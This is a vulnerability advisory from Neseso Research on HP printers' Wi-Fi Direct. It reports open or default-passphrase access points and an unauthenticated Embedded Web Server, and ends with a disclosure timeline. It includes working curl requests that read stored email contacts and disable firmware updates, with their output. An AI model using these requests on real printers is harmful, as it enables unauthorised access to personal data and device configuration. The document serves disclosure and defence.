HP Printers Wi-Fi Direct Improper Access Control

More documents

Recommendations

Info

6. Credits This vulnerability was discovered and researched by a member from Neseso Research Team. 7. Technical Description Wi-Fi Direct Improper Access Control Wi-Fi Direct [1], initially called Wi-Fi P2P, is a Wi-Fi standard enabling devices to easily connect with each other without requiring a wireless access point. It is useful for everything from internet browsing to file transfer, and to communicate with one or more devices simultaneously at typical Wi-Fi speeds. In a scenario where two devices want to connect they can authenticate using methods such as PIN, Push-Button or NFC. HP Printers implement Wi-Fi Direct[2] support in two ways, one as described on the Wi-Fi Direct specification and the other providing a wi-fi access point that has no security or uses insecure default credentials (12345678 passphrase is used by default on newer models). Giving access to anyone that is near enough to establish a Wi-Fi connection without any user interaction or notification. The second vulnerability is that the printing services and others, such as the Embedded Web Server has no authentication by default which gives anyone the ability to not only access sensitive information but also modify device configuration. These two vulnerabilities exposes user information and gives unrestricted remote read/write access to the configuration and services of the printer. Below two examples of HTTP requests that attackers could use to access emails stored on the device or disable automatic firmware updates. $ curl -v --insecure https://192.168.223.1/DevMgmt/Email/Contacts * Trying 192.168.223.1... * Connected to 192.168.223.1 (192.168.223.1) port 443 (#0) * TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256 * Server certificate: HP16B465 > GET /DevMgmt/Email/Contacts HTTP/1.1 > Host: 192.168.223.1 > User-Agent: curl/7.43.0 > Accept: */* > < HTTP/1.1 200 OK < Server: HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number: XXXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR} < Content-Type: text/xml < Content-Length: 203 < Cache-Control: must-revalidate, max-age=0 < Pragma: no-cache < * Connection #0 to host 192.168.1.17 left intact
$ cat data.xml disabled disabled $ curl -v -X PUT --insecure -d @data.xml https://192.168.223.1/FirmwareUpdate/ WebFWUpdate/Config --header "Content-Type:text/xml" * Trying 192.168.223.1... * Connected to 192.168.223.1 (192.168.223.1) port 443 (#0) * TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256 * Server certificate: HP16B465 > PUT /FirmwareUpdate/WebFWUpdate/Config HTTP/1.1 > Host: 192.168.223.1 > User-Agent: curl/7.43.0 > Accept: */* > Content-Type:text/xml > Content-Length: 487 > * upload completely sent off: 487 out of 487 bytes < HTTP/1.1 200 OK < Server: HP HTTP Server; HP HP OfficeJet Pro 8710 - D9L18A; Serial Number: XXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR} < Content-Length: 0 < Cache-Control: must-revalidate, max-age=0 < Pragma: no-cache < * Connection #0 to host 192.168.223.1 left intact Attackers can do other attacks such as setting a proxy, doing configuration backups, getting network information among others. 8. Report Timeline • 2017-01-11: Neseso attempted to contact HP Inc. security contact. • 2017-01-13: Neseso attempted to contact HP Inc. security contact. • 2017-01-16: Neseso attempted to contact HP Inc. security contact for third time using the web form to report vulnerabilities on Hewlett Packard Enterprise site. • 2017-01-17: HP Enterprise contact reply that printers vulnerabilities must be reported to contact HP Inc. • 2017-01-17: Neseso asked HP Enterprise if there is other security contact for HP Inc. besides the one used before. • 2017-01-17: HP Enterprise security contact replied that the security contact for HP Inc. is correct and we should contact them. • 2017-01-17: Neseso attempted for fourth time to contact HP Inc. security contact. • 2017-01-23: Neseso notifies that if the vendor refuses to response the advisory will be released on February 1st, 2017. • 2017-01-26: Neseso informed HP Inc. that it is their last chance to answer the emails, if not the advisory was going to be released on February 1st, 2017. • 2017-02-01: Advisory NESESO-2017-0111 published as 'user release'. 9. References [1] - http://www.wi-fi.org/discover-wi-fi/wi-fi-direct
Page 1: HP Printers Wi-Fi Direct Improper A

HP Printers Wi-Fi Direct Improper Access Control

Create successful ePaper yourself

Delete template?

Save as template?